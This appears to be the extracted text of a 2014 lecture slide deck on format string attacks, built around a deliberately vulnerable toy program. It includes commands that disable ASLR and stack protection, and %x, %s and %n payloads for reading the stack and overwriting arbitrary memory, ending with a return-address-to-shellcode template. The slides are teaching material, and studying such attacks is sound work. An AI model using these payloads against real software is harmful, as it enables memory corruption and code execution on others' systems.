Upload
aj0612
View
546
Download
0
Embed Size (px)
DESCRIPTION
一個學習format string attack與分享的故事 Outline: *Illustrating format string vulnerabilities *A case study +fsa.c +Compile and setup insecure environment +Viewing the stack +Viewing Memory at any location +Overwriting of arbitrary memory *So, You Can…
Citation preview
Format String AttacksAJ
2014.1.18
About Me
• Study in National Chung Cheng University
• The simulator of 5 axis CNC machine tool• CUDA programming for the collision detection in real time
• 若渴計畫 & MOSUT
Outline
• Illustrating format string vulnerabilities • A case study• fsa.c• Compile and setup insecure environment• Viewing the stack• Viewing memory at any location• Overwriting of arbitrary memory
• So, you can…
Format String Vulnerabilities
• format string <->argv[1]• printf(argv[1])• strcpy(buff,argv[1])• snprintf(buf,sizeof buf,argv[1]);• …
• EX:
compile & execute
A Case Study: fsa.c
A Case Study: Compile and Setup Insecure Environment•Compile• gcc -g -Wno-format-security -fno-stack-protector fsa.c
•Disable ASLR(address space layout randomization)• sudo sysctl -w kernel.randomize_va_space=0
•X86 machine & Unbuntu 12.04
Stack Status before Executing snpritf()
??
??
??
x = 97 = ‘a’
buf[100]
stack
esp
Viewing the Stack:”%x.%x.%x.%x.%x”• Format string = %x.%x.%x.%x.%x
• snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”)
Buffer pointer
Buffer length
argv[1] pointer
?? b7ff3fec
?? bfffff3b4
?? 0
x = 97 = ‘a’
buf[100]
“%x.%x.%x.%x.%x”
heap
Richard Reese, 透視 c 語言指標 p.128
c call conventionhttp://descent-incoming.blogspot.tw/2012/11/pascal-call-convention-in-c.html
Viewing the Stack:”%x.%x.%x.%x.%x”• Format string = %x.%x.%x.%x.%x
• snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”)
Buffer pointer
Buffer length
argv[1] pointer
?? b7ff3fec
?? bfffff3b4
?? 0
x = 97 = ‘a’
buf[100]
“%x.%x.%x.%x.%x”
heap
%x
%x
%x%x
%x
fetch
stack
Viewing the Stack:”%x.%x.%x.%x.%x”• Format string = %x.%x.%x.%x.%x
• snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”)
Buffer pointer
Buffer length
argv[1] pointer
?? b7ff3fec
?? bfffff3b4
?? 0
x = 97 = ‘a’
buf[100]=b7ff3fec. Bfffff3b4. 0.61.66663762(ff7b)
“%x.%x.%x.%x.%x”
heap
copy
Execution order of “copy” and “fetch” are switched by OS
%x??
Viewing the Stack: “aaaa.%x.%x.%x.%x.%x”• Format string = aaaa.%x.%x.%x.%x.%x
• ‘a’ is 0x61 in ASCII• snprintf(buf, sizeof buf, “aaaa.%x.%x.%x.%x.%x”)
Buffer pointer
Buffer length
argv[1] pointer
?? b7ff3fec
?? bfffff3b4
?? 0
x = 97 = ‘a’
buf[100]=aaaa.b7ff3fec.bffff3a4.0.61.61616161
“aaaa.%x.%x.%x.%x.%x”
heap
%x
%x
%x%x
%x
Viewing Memory at Any Location
• Format string = $(printf “\xf8\xf2\xff\xbf”).%x.%x.%x.%x.%x
• Format string = $(printf “\xf8\xf2\xff\xbf”).%x.%x.%x.%x.%s
x = 97 = ‘a’
buf[0]=bffff2f8%s
bffff2f8
Overwriting of Arbitrary Memory
• The %n field was encountered in the format string• Format string = $(printf “\xf8\xf2\xff\xbf”).%x.%x.%x.%x.%n
x = 97 = ‘a’
buf[0]=bffff2f8%s
bffff2f8 x = 28 = 0x1c
buf[0]=bffff2f8%n
bffff2f8
26(??) alignment
So, You Can…
• Format string vulnerabilities • Viewing the stack
• Finding return addresses
• Overwriting return address • Overwriting return addresses to point to shellcode• EX: $ ./a.out $(printf “return address”).%x.%x.%x.%x.%n => retrun address = 28 $ ./a.out $(printf “return address”).%x.%x.%x.%4x.%n => retrun address = 30 $ ./a.out $(printf “return address”).%x.%x.%x.%8x.%n => retrun address = 34 $ ./a.out $(printf “return address”).%Xx.%Yx.%Zx.%Ax.%n => retrun address = shellcode address
You can overwrite arbitrary memory, if there are format string vulnerabilities
Reference
• Tim Newsham, “Format String Attacks”• http://www.thenewsh.com/~newsham/format-string-attacks.pdf
• stackoverflow,“How can a Format-String vulnerability be exploited?”• http://stackoverflow.com/questions/7459630/how-can-a-format-string-vulnerability
-be-exploited
• Paul Haas, Advanced Format String Attacks• http://
www.defcon.org/images/defcon-18/dc-18-presentations/Haas/DEFCON-18-Haas-Adv-Format-String-Attacks.pdf
• David Brumley, Cource sliedes• http://users.ece.cmu.edu/~dbrumley/courses/18739c-s11/slides/0127.pdf
• Scut et al,”Exploiting Format String Vulnerabilities” • http://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf